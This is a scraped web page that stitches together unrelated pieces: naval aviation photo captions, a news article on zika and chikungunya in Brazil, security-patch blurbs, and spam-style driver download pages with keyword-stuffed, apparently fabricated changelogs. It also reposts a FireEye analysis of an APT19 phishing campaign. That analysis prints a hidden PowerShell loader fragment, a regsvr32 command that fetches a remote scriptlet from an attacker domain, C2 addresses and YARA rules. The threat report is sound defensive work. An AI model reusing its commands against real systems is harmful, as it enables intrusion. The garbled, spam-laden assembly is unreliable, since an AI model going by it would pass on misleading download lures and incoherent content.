Un F4U-4 Corsair du Marine Fighter Attack Squadron VMFA-212 est sur la catapulte, prêt pour un lancement depuis le porte-avions d'escorte USS Badoeng Strait (CVE-116) pour une frappe en Corée – Guerre de Corée – 1952

Photographe : Gerald Haddock

©US Navy National Museum of Naval Aviation - 1996.253.7154.010

A group of VF-1E FR-1s in flight with their piston engines shut down, 1947. The squadron was assigned to USS Badoeng Strait (CVE-116) for testing

A Grumman AF-2S (killer...no radome), comes aboard USS Badoeng Strait (CVE-116).

Just get a load of that wing span!

Search light on the left wing (also possible combined sonobuoy pod), and APS-31 radar on right wing.

@AncientSubHunter via X

Cases of chikungunya and zika fall in Brazil, but most risk clusters exhibit an upward trend

- By Julia Moióli , Agência FAPESP -

Analysis of occurrence and co-occurrence patterns shows the highest-risk clusters of chikungunya and zika in Brazil spreading from the Northeast to the Center-West and coastal areas of São Paulo state and Rio de Janeiro state in the Southeast between 2018 and 2021, and increasing again in the Northeast between 2019 and 2021.

In Brazil overall, spatial variations in the temporal trends for chikungunya and zika decreased 13% and 40% respectively, but 85% and 57% of the clusters in question displayed a rise in numbers of cases. 

These findings are from an article published in Scientific Reports by researchers at the University of São Paulo’s School of Public Health (FSP-USP) and São Paulo state’s Center for Epidemiological Surveillance (CVE) who analyzed spatial-temporal patterns of occurrence and co-occurrence of the two arboviral diseases in all Brazilian municipalities as well as the environmental and socio-economic factors associated with them.

Considered neglected tropical diseases by the Pan American Health Organization (PAHO/WHO), chikungunya and zika are arboviral diseases caused by viruses of the families Togaviridae and Flaviviridae respectively, and transmitted by mosquitoes of the genus Aedes. Case numbers of both diseases have risen worldwide in the last decade and expanded geographically: chikungunya has been reported in 116 countries and zika in 92, according to the Centers for Disease Control and Prevention (CDC), the main health surveillance agency in the United States. Some 8 million people are estimated to have been infected worldwide, although the number may have reached 100 million in light of generalized underreporting of neglected tropical diseases.

The emergence and re-emergence of chikungunya and zika are facilitated by environmental factors such as urbanization, deforestation and climate change, including droughts and floods. “Identifying high-risk areas for the spread of these arboviruses is important both to control the vectors and to target public health measures correctly,” said Raquel Gardini Sanches Palasio, corresponding author of the article. She is affiliated with FSP-USP’s Department of Epidemiology, where she is a researcher in the Laboratory for Spatial Analysis in Health (LAES).

Working with her PhD thesis advisor, Francisco Chiaravalloti Neto, and other researchers at USP and CVE, Palasio analyzed more than 770,000 cases (608,388 of chikungunya and 162,992 of zika) diagnosed by laboratory test or clinical and epidemiological analysis; most were autochthonous (due to locally acquired infection). The analysis encompassed spatial, temporal and seasonal data, as well as temperature, rainfall and socio-economic factors.

The results showed that high-risk areas had higher temperatures and identified co-occurrence clusters in certain regions. “In the first few years of the period the high-risk clusters were in the Northeast. They then spread to the Center-West – zika in 2016 and chikungunya in 2018 – and to coastal areas in the Southeast – in 2018 and 2021 respectively – followed by resurgence in the Northeast,” Palasio said. 

“Spatial variations in the temporal trends for chikungunya and zika decreased 13% and 40% respectively, but numbers of cases rose in 85% and 57% of the clusters concerned. Spatial variation clusters with a growing internal trend predominated in practically all states, with annual growth of 0.85%-96.56% for chikungunya and 2.77%-53.03% for zika.

“We also found that both diseases have occurred more frequently in summer and fall in Brazil since 2015. Chikungunya is associated with low rainfall, urbanization and social inequality, while zika correlates closely with high rainfall and lack of basic sanitation.”

Both are also more frequent in urban areas with less vegetation, she said, adding that socio-economic factors appear to correlate less with zika than with chikungunya.

Next steps 

“Both diseases have the same vectors and are similar in some other ways, so theoretically they should occur in the same places. We didn’t observe perfect overlapping in space and time, however,” Palasio said.

A hypothesis raised by the researchers who conducted the study, which was funded by FAPESP, relates to socio-economic factors, environment and climate. The main source of data was the 2010 census, and next steps will include an update using fresh data from IBGE’s 2022 census.

“We also want to perform a spatial and temporal analysis using a broader dataset that takes socio-economic factors and climate [especially temperature and rainfall] into account together rather than separately,” Palasio said.

Another focus will be co-occurrence or overlapping of the two diseases. Future climate change models will be run under best-case and worst-case scenarios for greenhouse gas emissions.

The article “Zika, chikungunya and co-occurrence in Brazil: space-time clusters and associated environmental-socio-economic factors” is at: www.nature.com/articles/s41598-023-42930-4.

Image: Analysis of spatial variations in temporal trends for cases of chikungunya (A) and zika (B) in Brazil between 2015 and 2022. Credit: Scientific Reports.

This text was originally published by FAPESP Agency according to Creative Commons license CC-BY-NC-ND. Read the original here.

--

Read Also

Mapping dengue hot spots determines risks for Zika and chikungunya

Google Patches Chrome Zero-Day Reported by Apple, Spyware Hunters

Google on Monday released an emergency Chrome 116 security update to patch the fourth zero-day vulnerability discovered in the browser in 2023. Tracked as CVE-2023-4863 and rated ‘critical severity’, the bug is described as a heap buffer overflow issue in the WebP component. WebP is an image format that provides improved compression and quality compared to the well-known JPEG and PNG formats,…

View On WordPress

Vought F4U Corsair by Willard Womack Via Flickr: U.S. Navy and Marine ordnance personnel load Marine F4U "Corsair" fighter bombers with rockets and napalm bombs aboard the USS BADOENG STRAIT (CVE-116) off the coast of Korea.

The U.S. Navy escort carrier USS Badoeng Strait (CVE-116) underway off Korea, operating Vought F4U Corsairs of Marine Fighter Squadron 212 (VMF-212). 13th January 1952.

Download zend studio 9.0.3

DOWNLOAD ZEND STUDIO 9.0.3 PDF

DOWNLOAD ZEND STUDIO 9.0.3 INSTALL

Trojan/Backdoor - JS.Scob.Trojan/Download. Trojan/Backdoor - MyDOOM/NoVarg Detection Trojan/Backdoor - W32/Bagle Virus Detection PVS PLUGIN FAMILIES COUNT FAMILY NAME 100 For more information regarding PVS, please visit: This information includes a brief description, plugin ID, CVE cross-reference, Bugtraq ID cross-reference, Nessus cross-reference, and several other descriptive entries.

DOWNLOAD ZEND STUDIO 9.0.3 PDF

Finally, the PDF details specific information for each of the different plugin modules.

DOWNLOAD ZEND STUDIO 9.0.3 INSTALL

Initially, you have this introduction followed by an overview of plugin count for each plugin family. This article is now available in our new knowledge base: Download and install Zend Server for IBM i Issue This article provides some basic tips to help you find, download, and install Zend Server. This PDF is organized into several sections. This PDF is automatically generated as new plugins are made available for download from the Tenable Network Security Corporate Web Server. Passively determining the type of operating system of each active host.Detecting which ports are served and which ports are browsed for each individual system.Tracking exactly which systems communicate with other internal systems.Highlighting all interactive and encrypted network sessions.Detecting when an internal system begins to port scan other systems.Detecting when new hosts are added to the network.Detecting when an application is compromised or subverted.Keeping track of all client and server application vulnerabilities.There is a branded version of Eclipse called Zend Studio but it is pretty expensive. A single PVS sensor can be placed in front of a network of 25,000 systems and continuously monitor the traffic for a variety of security related information including: As i have download the Eclipse PHP Development Tools (PDT) but its a separate eclipse studio only, but i want to use it from my already installed eclipse. As PVS monitors your network, it also watches for potential application compromises, trust relationships, and open or browsed network protocols. The PVS vulnerability monitor can find out what is happening on your network without actively scanning it. Do you know what happens between the last time a vulnerability scan is completed and the next time a scan is completed? New hosts, new ports, new services, and new vulnerabilities can arrive on your networks faster than you may be allowed to scan for them. Introduction PVS is a passive vulnerability scanner. Table of Contents Family Web Clients.158 Family Web Servers.216 Family Abuse.290 Family Policy.291 Family Data Leakage.299 Family SCADA.308 Family Mobile Devices.318 Family Internet Services.327 Table of Contents Introduction.1 PVS PLUGIN FAMILIES.2 Family Backdoors.4 Family CGI.8 Family Database.45 Family DNS Servers.61 Family Finger.65 Family FTP Servers.66 Family FTP Clients.71 Family Generic.73 Family Operating System Detection.106 Family IMAP Servers.113 Family Internet Messengers.116 Family IRC Clients.122 Family IRC Servers.124 Family Peer-To-Peer File Sharing.125 Family POP Server.128 Family RPC.130 Family Samba.133 Family SMTP Clients.136 Family SMTP Servers.146 Family SNMP Traps.154 Family SSH.155 Passive Vulnerability Scanner (PVS) Signatures

15 de Julio, 2021

Internacional

Actualizaciones Críticas De Seguridad De Microsoft

Actualizaciones para parchear al menos 116 vulnerabilidades de seguridad en sistemas operativos Windows y software relacionado. Al menos cuatro de las vulnerabilidades están bajo ataque activo, Trece de las vulnerabilidades tienen calificación "crítica", lo que significa que pueden ser explotados por malware o atacantes remotos para tomar el control de un sistema vulnerable sin la ayuda de los usuarios. Otros 103 de los agujeros de seguridad cuya explotación podría resultar en un compromiso de la confidencialidad, integridad o disponibilidad de los datos del usuario.

 E.@. Entre los errores críticos se encuentra, por supuesto, la solución oficial para la falla de la cola de impresión PrintNightmare en la mayoría de las versiones de Windows (CVE-2021-34527) que llevó a Microsoft a lanzar un parche incompleto hace una semana, en respuesta al código de explotación disponible accidentalmente en línea. Ese parche parece haber causado varios problemas a los usuarios de Windows. 

Los Controladores de Dominio (Active Directory) están particularmente expuestos, ya que un atacante, que ha comprometido previamente la estación de trabajo de un usuario, puede finalmente obtener los derechos y privilegios en el nivel de "administrador de dominio". 

Microsoft también corrigió seis vulnerabilidades en Exchange Server, el cual ha estado asediado durante todo el año por los atacantes. Satnam Narang, ingeniero de investigación de personal de Tenable, señaló que si bien Microsoft dice que dos de los errores de Exchange abordados este mes (CVE-2021-34473 y CVE-2021-34523) se abordaron como parte de sus actualizaciones de seguridad de abril de 2021, ambos CVE fueron de alguna manera omitido en ese lanzamiento y agregados ahora. Es decir, si ya aplicó la gran cantidad de actualizaciones de Exchange que Microsoft puso a disposición en abril, sus sistemas de Exchange tienen protección contra estos defectos.

 Fuente

<strong>80-G-441735 <a href="https://www.flickr.com/photos/127906254@N06/">by National Museum of the U.S. Navy</a></strong>

80-G-441735: USS Badoeng Straits (CVE-116), 1952. Carl, Janet, and Carol Wilbur (left to right) are over joyed upon the return of their father Lieutenant Commander Carl E. Wilbur onboard while the ship pulls in at Naval Air Station, San Diego, California. Official U.S. Navy Photograph, now in the collections of the National Archives. (2017/11/01). Photograph is extremely curved.

An AF-2S of VS-37 lands aboard USS Badoeng Strait (CVE-116), 1 April 1954

Ronnie Bell Following

U.S. Navy Ryan FR-1 Fireball launches from the flight deck of the escort carrier USS Badoeng Strait (CVE-116), March-June 1947.

en.wikipedia.org/wiki/Ryan_FR_Fireball

Via Flickr

DOWNLOAD INTEL CENTRINO WIRELESS N130 DRIVER

Downloads: 2544 File Version: 218101005 Price: Free Download Type: http Uploader: Sally File Size: 23 Mb File Name: intel centrino wireless n130 driver Date Added: 14 November, 2019 File Format: exe Operating Systems: Windows NT/2000/XP/2003/2003/7/8/10 MacOS 10/X

What's New: - Fixes Compaq(intel centrino wireless n130 driver Compaq) Presario 2800 Series power management issue that caused a "blue screen" error. - Bug Fixes -(intel centrino wireless n130 driver -) [SMB]: Modified to deal with a Samba programming vulnerability (CVE-2017-7494). - Fixed Start recording and plug-out SD Card, Recording icon don't disappered. - Fixes LED charging indicator does not work on AC mode. - Fixed when changing the Scan storage option from ‘off’ to ‘on’, the scanning will start immediately instead of doing so on the next boot. - Fixes(intel centrino wireless n130 driver Fixes) a "blue screen" event with code 116 that occurs when running a screen saver overnight if the the notebook is in Extended Desktop mode. - Fixed Issues: - Some color corruption seen in Adobe Premiere Pro with 10 bit pixel format has been fixed. - Fixes shutdown problem in(intel centrino wireless n130 driver in) Win 2000. - Antivirus:(intel centrino wireless n130 driver Antivirus:) - Fixed the bug where the update dialog box could not close when updating the components from the antivirus options page. - Fixed the Intel Lan show "!" after wake up from s3/s4/s5 It is highly recommended to always use the most recent driver version available. Users content: DNS request from local IPv6 will be relayed to IPv4 DNS server, if no IPv6 DNS server is provisioned from ISP. Add Access Point mode 4. Added IPS mode in the setting of Screen Brightness. Upgrade mydlink agent to v2.0.20-b09 to fix the notification issue. Mirco ATX Form Factor; 24.3cm x 22.0 cm It is highly recommended to always use the most recent driver version available. Overlay Theater Mode - Supported, initially off * Control Panel – NoTheaterModeNOTE:Removes "Theater Mode" radio button. - To support FSB1333 CPU+DDR2 667 memory. History - Windows 8.1 has been added as a supported OS. - Windows 7 has been added as a supported OS. - Windows 8 has been added as a supported OS. Update Skylake CPU Microcode to revision C2 and Kabylake CPU Microcode to revision 84. (For CPU security update)2. If the newest NAS Navigator2 is not installed on your PC, the message "Unknown error occurred" may appear after the firmware update. DOWNLOAD DVD WRITER MODEL SH-S203B DRIVER Supported OS: Windows Server 2008 Windows 8 Windows XP 64-bit Windows 2000 Microsoft Windows 8.1 (64-bit) Windows Vista 64-bit Microsoft Windows 8 (64-bit) Windows Vista 32-bit Windows Server 2003 32-bit Notebook 8.1/8/7 32-bit Microsoft Windows 8.1 Pro (32-bit) Windows Server 2012 Microsoft Windows 8 Pro (32-bit) Windows 8.1/8/7/Vista 32-bit Windows XP 32-bit Windows 7 32-bit Microsoft Windows 8 Enterprise (32-bit) Windows Server 2008 R2 Windows Server 2016 Notebook 8.1/8/7 64-bit Microsoft Windows 10 (64-bit) Windows Server 2003 64-bit Windows Server 2012 R2 Microsoft Windows 10 (32-bit) Windows 8.1 Microsoft Windows 8 Enterprise (64-bit) Windows 7 64-bit Windows 7 Microsoft Windows 8.1 Enterprise (32-bit) Microsoft Windows 8 (32-bit) Microsoft Windows 8.1 Pro (64-bit) Windows 8.1/8/7/Vista 64-bit Windows 10 Microsoft Windows 8.1 Enterprise (64-bit) Microsoft Windows 8.1 (32-bit) Microsoft Windows 8 Pro (64-bit) Searches: intel centrino wireless n130 driver for Windows XP 64-bit; intel centrino wireless n130 driver for Microsoft Windows 8 (32-bit); intel centrino wireless n130 PXQBF6019; n130 wireless driver intel centrino; intel centrino wireless n130 Pav601-ave; intel centrino wireless n130 PX6019; intel centrino wireless n130 driver for Microsoft Windows 8.1 Enterprise (32-bit); intel centrino wireless n130 driver for Windows 2000; intel centrino wireless n130 P PX601-6; intel centrino wireless n130 driver for Windows Server 2012; intel centrino wireless n130 P60a Compatible Devices: Samsung; Memory Card; Gadget; Ipod; Usb Cables; Wifi adapter To ensure the integrity of your download, please verify the checksum value. MD5: 06fac8213182a55b5aa42a052b201f4a SHA1: f8a919eff63b8a9b5fae5dcfd72db5baaee49dab SHA-256: e386cedc5d8fe2a24b0cc7ddcd84a399da53a9f2c20e6531ecff6f04c02d294d

Grumman TBM-3 Avenger BuNo 53800 'SK 416' of VS 25 by Batman_60 Via Flickr: over the escort carrier Badoeng Strait (CVE 116) on March 15, 1950.

DOWNLOAD AZFIN AZF3328 SOUND CARD DRIVER

File Format: exe File Size: 23 Mb File Name: azfin azf3328 sound card driver Date Added: 10 December, 2019 Operating Systems: Windows NT/2000/XP/2003/2003/7/8/10 MacOS 10/X Price: Free Downloads: 5381 Uploader: Star File Version: 818121783 Download Type: http

News: - Fixes issue where hot key display switching did not "remember" the resolution. - Fixed the issue where(azfin azf3328 sound card driver where) the internal temperature monitor did not work when the PC reboots or recovers from hibernation mode. - Fixed(azfin azf3328 sound card driver Fixed) some Large Hard Drive can not be detected issueIt is highly recommended to always use the most recent driver version available. - Fixed(azfin azf3328 sound card driver Fixed) errors with parameters whose Data Type is PhTmplt (such as Caller Sel X Caller and Ring X Caller). - Fixed an issue in which T38 fax failed. - Fixed issue: ATK service can't(azfin azf3328 sound card driver can't) restart after stop it. - Fixed some 266 FSB CPU ghost fail. - Fixed(azfin azf3328 sound card driver Fixed) an issue that might have a blue screen error (Bugcheck code 116) when the DVI was used. - Fixes a phenomenon in which the EF Cinema lens' F number was incorrectly displayed. - Fixed watchdog function fail when overclock by Table. - Fixed VPN server related issues. Users content: Known Issues - Specific workstation build information may not be visible in FirePro Settings within the System > Software tab. Confirm your choice by clicking OK Profiles and Modes when exported will now only contain active Actions and Lighting items assigned to a key or a group of keys. As a work around please disable AMD Crossfire for the games profile in the Radeon Settings Gaming tab. Installation Notes:- This custom firmware can be applied like any regular update. Hz / 1920 x 1080 @ 60 Hz - Supports DVI with max. - Added support for ThinkPad X130e. - Update Express Gate to v1.4.6. Added the ability to search (or filter) on the signature ID or text found in the signature description, like a CVE number. Therefore, if you want to install this bundle, click the download button and apply the package. https://realdriverscloudz69.wordpress.com/2020/03/28/download-dell-qle2460-driver/ Supported OS: Notebook 8.1/8/7 64-bit Microsoft Windows 8.1 Enterprise (32-bit) Windows Server 2008 R2 Windows 10 Windows 8.1/8/7/Vista 64-bit Microsoft Windows 8.1 (64-bit) Microsoft Windows 8 (64-bit) Windows Server 2003 64-bit Microsoft Windows 8 Pro (64-bit) Windows 7 64-bit Windows Server 2016 Windows 2000 Windows Server 2003 32-bit Microsoft Windows 8.1 Pro (64-bit) Windows XP 32-bit Microsoft Windows 8 Enterprise (32-bit) Microsoft Windows 8.1 (32-bit) Microsoft Windows 8.1 Pro (32-bit) Microsoft Windows 8 Pro (32-bit) Microsoft Windows 10 (64-bit) Windows Server 2012 Windows 7 Windows 8 Windows 8.1/8/7/Vista 32-bit Microsoft Windows 8 (32-bit) Windows Vista 64-bit Windows 8.1 Notebook 8.1/8/7 32-bit Windows XP 64-bit Windows Server 2012 R2 Microsoft Windows 10 (32-bit) Windows 7 32-bit Windows Vista 32-bit Microsoft Windows 8.1 Enterprise (64-bit) Windows Server 2008 Microsoft Windows 8 Enterprise (64-bit) Searches: azfin azf3328 sound card driver for Microsoft Windows 10 (32-bit); azfin azf3328 sound card driver for Windows Server 2012 R2; azfin azf3328 sound card driver for Windows Server 2003 32-bit; card sound azfin azf3328 driver; azfin azf3328 sound card MOJQA9820; azfin azf3328 sound card driver for Notebook 8.1/8/7 32-bit; azfin azf3328 sound card M98q; azfin azf3328 sound card M MO982-9; azfin azf3328 sound card driver for Microsoft Windows 8 Pro (64-bit); azfin azf3328 sound card MO9820; azfin azf3328 sound card Mqm982-qmp Compatible Devices: Hard Drive; Samsung; Keyboards; Iphone; Usb Cables; Printer To ensure the integrity of your download, please verify the checksum value. MD5: 6db9748956be40beacb40297bfcaed90 SHA1: 65f68c33229477a98fef1b8c01d35f5439e01a77 SHA-256: bf131128d90c6d303e2de25dda210ff0b93b8ec824aa0fb5c1abde52bd104a52

Original Post from FireEye Author: Ian Ahl

Summary

In May and June 2017, FireEye observed a phishing campaign targeting at least seven global law and investment firms. We have associated this campaign with APT19, a group that we assess is composed of freelancers, with some degree of sponsorship by the Chinese government.

APT19 used three different techniques to attempt to compromise targets. In early May, the phishing lures leveraged RTF attachments that exploited the Microsoft Windows vulnerability described in CVE 2017-0199. Toward the end of May, APT19 switched to using macro-enabled Microsoft Excel (XLSM) documents. In the most recent versions, APT19 added an application whitelisting bypass to the XLSM documents. At least one observed phishing lure delivered a Cobalt Strike payload.

As of the writing of this blog post, FireEye had not observed post-exploitation activity by the threat actors, so we cannot assess the goal of the campaign. We have previously observed APT19 steal data from law and investment firms for competitive economic purposes.

This purpose of this blog post is to inform law firms and investment firms of this phishing campaign and provide technical indicators that their IT personnel can use for proactive hunting and detection.

The Emails

APT19 phishing emails from this campaign originated from sender email accounts from the “@cloudsend[.]net” domain and used a variety of subjects and attachment names. Refer to the Indicators of Compromise section for more details.

The Attachments

APT19 leveraged Rich Text Format (RTF) and macro-enabled Microsoft Excel (XLSM) files to deliver their initial exploits. The following sections describe the two methods in further detail.

RTF Attachments

Through the exploitation of the HTA handler vulnerability described in CVE-2017-1099, the observed RTF attachments download hxxp://tk-in-f156.2bunny[.]com/Agreement.doc. Unfortunately, this file was no longer hosted at tk-in-f156.2bunny[.]com for further analysis. Figure 1 is a screenshot of a packet capture showing one of the RTF files reaching out to hxxp://tk-in-f156.2bunny[.]com/Agreement.doc.

Figure 1: RTF PCAP

XLSM Attachments

The XLSM attachments contained multiple worksheets with content that reflected the attachment name. The attachments also contained an image that requested the user to “Enable Content”, which would enable macro support if it was disabled. Figure 2 provides a screenshot of one of the XLSM files (MD5:30f149479c02b741e897cdb9ecd22da7).

Figure 2: Enable macros

One of the malicious XLSM attachments that we observed contained a macro that:

Determined the system architecture to select the correct path for PowerShell

Launched a ZLIB compressed and Base64 encoded command with PowerShell. This is a typical technique used by Meterpreter stagers.

Figure 3 depicts the macro embedded within the XLSM file (MD5: 38125a991efc6ab02f7134db0ebe21b6).

Figure 3: XLSX Macro

Figure 4 contains the decoded output of the encoded text.

Figure 4: Decoded ZLIB + Base64 payload

The shellcode invokes PowerShell to issue a HTTP GET request for a random four (4) character URI on the root of autodiscovery[.]2bunny[.]com. The requests contain minimal HTTP headers since the PowerShell command is executed with mostly default parameters. Figure 5 depicts an HTTP GET request generated by the payload, with minimal HTTP headers.

Figure 5: GET Request with minimal HTTP headers

Converting the shellcode to ASCII and removing the non-printable characters provides a quick way to pull out network-based indicators (NBI) from the shellcode. Figure 6 shows the extracted NBIs.

Figure 6: Decoded shellcode

FireEye also identified an alternate macro in some of the XLSM documents, displayed in Figure 7.

Figure 7: Alternate macro

This macro uses Casey Smith’s “Squiblydoo” Application Whitelisting bypass technique to run the command in Figure 8.

Figure 8: Application Whitelisting Bypass

The command in Figure 8 downloads and launches code within an SCT file. The SCT file in the payload (MD5: 1554d6fe12830ae57284b389a1132d65) contained the code shown in Figure 9.

Figure 9: SCT contents

Figure 10 provides the decoded script. Notice the “$DoIt” string, which is usually indicative of a Cobalt Strike payload.

Figure 10: Decoded SCT contents

A quick conversion of the contents of the variable “$var_code” from Base64 to ASCII shows some familiar network indicators, shown in Figure 11.

Figure 11: $var_code to ASCII

Second Stage Payload

Once the XLSM launches its PowerShell command, it downloads a typical Cobalt Strike BEACON payload, configured with the following parameters:

Process Inject Targets:

%windir%syswow64rundll32.exe

%windir%sysnativerundll32.exe

c2_user_agents

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts; IE0006_ver1;EN_GB)

Named Pipes

\%spipemsagent_%x

beacon_interval

60

C2

autodiscover.2bunny[.]com/submit.php

autodiscover.2bunny[.]com/IE9CompatViewList.xml

sfo02s01-in-f2.cloudsend[.]net/submit.php

sfo02s01-in-f2.cloudsend[.]net/IE9CompatViewList.xml

C2 Port

TCP/80

Figure 12 depicts an example of a BEACON C2 attempt from this payload.

Figure 12: Cobalt Strike BEACON C2

FireEye Product Detections

The following FireEye products currently detect and block the methods described above. Table 1 lists the current detection and blocking capabilities by product.

Detection Name

Product

Action

Notes

SUSPICIOUS POWERSHELL USAGE (METHODOLOGY)

HX

Detect

XSLM Macro launch

Gen:Variant.Application.HackTool.CobaltStrike.1

HX

Detect

XSLM Macro launch

Malware Object

HX

Detect

BEACON written to disk

Backdoor.BEACON

NX

Block*

BEACON Callback

FE_Malformed_RTF

EX/ETP/NX

Block*

RTF

Malware.Binary.rtf

EX/ETP/NX

Block*

RTF

Malware.Binary

EX/ETP/NX

Block*

RTF

Malware.Binary.xlsx

EX/ETP/NX

Block*

XSLM

Table 1: Detection review

*Appliances must be configured for block mode.

Recommendations

FireEye recommends organizations perform the following steps to mitigate the risk of this campaign:

Microsoft Office users should apply the patch from Microsoft as soon as possible, if they have not already installed it.

Search historic and future emails that match the included indicators of compromise.

Review web proxy logs for connections to the included network based indicators of compromise.

Block connections to the included fully qualified domain names.

Review endpoints for the included host based indicators of compromise.

Indicators of Compromise

The following section provides the IOCs for the variants of the phishing emails and malicious payloads that FireEye has observed during this campaign.

Email Senders

PressReader

Angela Suh

Ashley Safronoff

Lindsey Hersh

Sarah Roberto sarah.roberto@cloudsend[.]net

noreply@cloudsend[.]net

Email Subject Lines

Macron Denies Authenticity Of Leak, French Prosecutors Open Probe

Macron Document Leaker Releases New Images, Promises More Information

Are Emmanuel Macron’s Tax Evasion Documents Real?

Time Allocation

Vacancy Report

china paper table and graph

results with zeros – some ready not all finished

Macron Leaks contain secret plans for the islamisation of France and Europe

Attachment Names

Macron_Authenticity.doc.rtf

Macron_Information.doc.rtf

US and EU Trade with China and China CA.xlsm

Tables 4 5 7 Appendix with zeros.xlsm

Project Codes – 05.30.17.xlsm

Weekly Vacancy Status Report 5-30-15.xlsm

Macron_Tax_Evasion.doc.rtf

Macron_secret_plans.doc.rtf

Network Based Indicators (NBI)

lyncdiscover.2bunny[.]com

autodiscover.2bunny[.]com

lyncdiscover.2bunny[.]com:443/Autodiscover/AutodiscoverService/

lyncdiscover.2bunny[.]com/Autodiscover

autodiscover.2bunny[.]com/K5om

sfo02s01-in-f2.cloudsend[.]net/submit.php

sfo02s01-in-f2.cloudsend[.]net/IE9CompatViewList.xml

tk-in-f156.2bunny[.]com

tk-in-f156.2bunny[.]com/Agreement.doc

104.236.77[.]169

138.68.45[.]9

162.243.143[.]145

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts; IE0006_ver1;EN_GB)

tf-in-f167.2bunny[.]com:443 (*Only seen in VT not ITW)

Host Based Indicators (HBI)

RTF MD5 hash values

0bef39d0e10b1edfe77617f494d733a8

0e6da59f10e1c4685bb5b35a30fc8fb6

cebd0e9e05749665d893e78c452607e2

XLSX MD5 hash values

38125a991efc6ab02f7134db0ebe21b6

3a1dca21bfe72368f2dd46eb4d9b48c4

30f149479c02b741e897cdb9ecd22da7

BEACON and Meterpreter payload MD5 hash values

bae0b39197a1ac9e24bdf9a9483b18ea

1151619d06a461456b310096db6bc548

Process arguments, named pipes, and file paths

powershell.exe -NoP -NonI -W Hidden -Command “Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(““)

regsvr32.exe /s /n /u /i:hxxps://lyncdiscover.2bunny.com/Autodiscover scrobj.dll

\pipemsagent_<4 digits>

C:Documents and SettingsLocal SettingsTempK5om.dll (4 character DLL based on URI of original GET request)

Yara Rules

rule FE_LEGALSTRIKE_MACRO {        meta:version=”.1″        filetype=”MACRO”        author=”[email protected] @TekDefense”        date=”2017-06-02″        description=”This rule is designed to identify macros with the specific encoding used in the sample 30f149479c02b741e897cdb9ecd22da7.” strings:        // OBSFUCATION        $ob1 = “ChrW(114) & ChrW(101) & ChrW(103) & ChrW(115) & ChrW(118) & ChrW(114) & ChrW(51) & ChrW(50) & ChrW(46) & ChrW(101)” ascii wide        $ob2 = “ChrW(120) & ChrW(101) & ChrW(32) & ChrW(47) & ChrW(115) & ChrW(32) & ChrW(47) & ChrW(110) & ChrW(32) & ChrW(47)” ascii wide        $ob3 = “ChrW(117) & ChrW(32) & ChrW(47) & ChrW(105) & ChrW(58) & ChrW(104) & ChrW(116) & ChrW(116) & ChrW(112) & ChrW(115)” ascii wide        $ob4 = “ChrW(58) & ChrW(47) & ChrW(47) & ChrW(108) & ChrW(121) & ChrW(110) & ChrW(99) & ChrW(100) & ChrW(105) & ChrW(115)” ascii wide        $ob5 = “ChrW(99) & ChrW(111) & ChrW(118) & ChrW(101) & ChrW(114) & ChrW(46) & ChrW(50) & ChrW(98) & ChrW(117) & ChrW(110)” ascii wide        $ob6 = “ChrW(110) & ChrW(121) & ChrW(46) & ChrW(99) & ChrW(111) & ChrW(109) & ChrW(47) & ChrW(65) & ChrW(117) & ChrW(116)” ascii wide        $ob7 = “ChrW(111) & ChrW(100) & ChrW(105) & ChrW(115) & ChrW(99) & ChrW(111) & ChrW(118) & ChrW(101) & ChrW(114) & ChrW(32)” ascii wide        $ob8 = “ChrW(115) & ChrW(99) & ChrW(114) & ChrW(111) & ChrW(98) & ChrW(106) & ChrW(46) & ChrW(100) & ChrW(108) & ChrW(108)” ascii wide        $obreg1 = /(w{5}s&s){7}w{5}/        $obreg2 = /(Chrw(d{1,3})s&s){7}/        // wscript        $wsobj1 = “Set Obj = CreateObject(“WScript.Shell”)” ascii wide        $wsobj2 = “Obj.Run ” ascii wide

condition:         (               (                       (uint16(0) != 0x5A4D)               )               and               (                       all of ($wsobj*) and 3 of ($ob*)                       or                       all of ($wsobj*) and all of ($obreg*)               )        ) }

  rule FE_LEGALSTRIKE_MACRO_2 {        meta:version=”.1″        filetype=”MACRO”        author=”[email protected] @TekDefense”        date=”2017-06-02″        description=”This rule was written to hit on specific variables and powershell command fragments as seen in the macro found in the XLSX file3a1dca21bfe72368f2dd46eb4d9b48c4.” strings:        // Setting the environment        $env1 = “Arch = Environ(“PROCESSOR_ARCHITECTURE”)” ascii wide        $env2 = “windir = Environ(“windir”)” ascii wide        $env3 = “windir + “\syswow64\windowspowershell\v1.0\powershell.exe”” ascii wide        // powershell command fragments        $ps1 = “-NoP” ascii wide        $ps2 = “-NonI” ascii wide        $ps3 = “-W Hidden” ascii wide        $ps4 = “-Command” ascii wide        $ps5 = “New-Object IO.StreamReader” ascii wide        $ps6 = “IO.Compression.DeflateStream” ascii wide        $ps7 = “IO.MemoryStream” ascii wide        $ps8 = “,$([Convert]::FromBase64String” ascii wide        $ps9 = “ReadToEnd();” ascii wide        $psregex1 = /Ww+s+s”.+”/ condition:        (               (                       (uint16(0) != 0x5A4D)               )               and               (                       all of ($env*) and 6 of ($ps*)                       or                       all of ($env*) and 4 of ($ps*) and all of ($psregex*)               )        ) }

  rule FE_LEGALSTRIKE_RTF {     meta:         version=”.1″         filetype=”MACRO”         author=”[email protected]”         date=”2017-06-02″         description=”Rtf Phishing Campaign leveraging the CVE 2017-0199 exploit, to point to the domain 2bunnyDOTcom”

    strings:         $header = “{\rt”

        $lnkinfo = “4c0069006e006b0049006e0066006f”

        $encoded1 = “4f4c45324c696e6b”         $encoded2 = “52006f006f007400200045006e007400720079”         $encoded3 = “4f0062006a0049006e0066006f”         $encoded4 = “4f006c0065”

        $http1 = “68{“         $http2 = “74{“         $http3 = “07{“

        // 2bunny.com         $domain1 = “32{\”         $domain2 = “62{\”         $domain3 = “75{\”         $domain4 = “6e{\”         $domain5 = “79{\”         $domain6 = “2e{\”         $domain7 = “63{\”         $domain8 = “6f{\”         $domain9 = “6d{\”

        $datastore = “\*\datastore”

    condition:         $header at 0 and all of them }

Acknowledgements

Joshua Kim, Nick Carr, Gerry Stellatos, Charles Carmakal, TJ Dahms, Nick Richard, Barry Vengerik, Justin Prosco, Christopher Glyer

